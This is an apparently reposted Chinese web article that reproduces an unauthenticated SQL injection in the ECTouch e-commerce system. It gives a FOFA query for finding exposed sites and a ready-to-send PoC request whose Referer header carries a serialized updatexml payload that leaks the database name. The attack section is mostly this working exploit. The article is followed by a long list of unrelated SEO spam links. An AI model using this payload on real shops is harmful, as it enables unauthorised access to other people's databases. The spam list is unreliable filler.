当前位置: 首页 > news >正文

python 网站开发 视频高级搜索

python 网站开发 视频,高级搜索,南宁做网站的公司,google和百度等相关网站的广告词0x01 产品简介 ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案 0x02 漏洞概述 ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr[id] 参数未进行验证和过滤,导致未经…

0x01 产品简介

ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案

0x02 漏洞概述

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。

0x03 复现环境

FOFA:"themes/default/statics/css/ectouch.css"

0x04 漏洞复现

PoC

GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

查询当前数据库

http://www.tj-hxxt.cn/news/113527.html

相关文章:

  • 网站备案 教程百度广告代理
  • 贺州网站建设宁波关键词优化企业网站建设
  • 公司做两个网站有影响吗推广链接让别人点击
  • 网购优惠券网站怎么做软文发稿公司
  • 做网站赚钱不温州seo优化
  • 学网站开发容易吗自己搭建网站
  • mac os网站建设如何做网页链接
  • 加微信群网站怎么做的app定制开发
  • wordpress什么文件暴力破解青岛seo服务
  • 注册企业网站需要多少钱关键词免费下载
  • 教育部网站 专业建设方案个人怎么创建网站
  • 网站制作 技术百度官方推广
  • ui私活20个页面以上多少钱广州seo外包多少钱
  • 做网站的虚拟机怎么用网站设计制作的服务怎么样
  • 做视频网站用什么格式登录注册入口
  • 苹果手机如何做微电影网站谷歌怎么投放广告
  • 重庆云阳网站建设价格软文新闻发布网站
  • 哪项不属于网站架构google建站推广
  • 个人网站的设计与实现结论南阳本地网络推广优化公司
  • 计算机网站开发项目昆明seo排名
  • 大学生创业做创意宿舍装修网站宝鸡seo
  • 南宁网站建设哪里有福州百度开户多少钱
  • 建设包包网站的目的大概需要多少钱
  • 怎么用阿里云建设网站下载安装
  • 可以做推文的网站河南省疫情最新情况
  • 东拼西凑网站谁做的网站seo推广平台
  • 音乐网站的制作百度网站排名关键词整站优化
  • dw做网站的实用特效北大青鸟
  • wordpress 同步微信素材徐州百度seo排名优化
  • 网站服务器有哪些类型有哪些类型有哪些类型有哪些类型元搜索引擎有哪些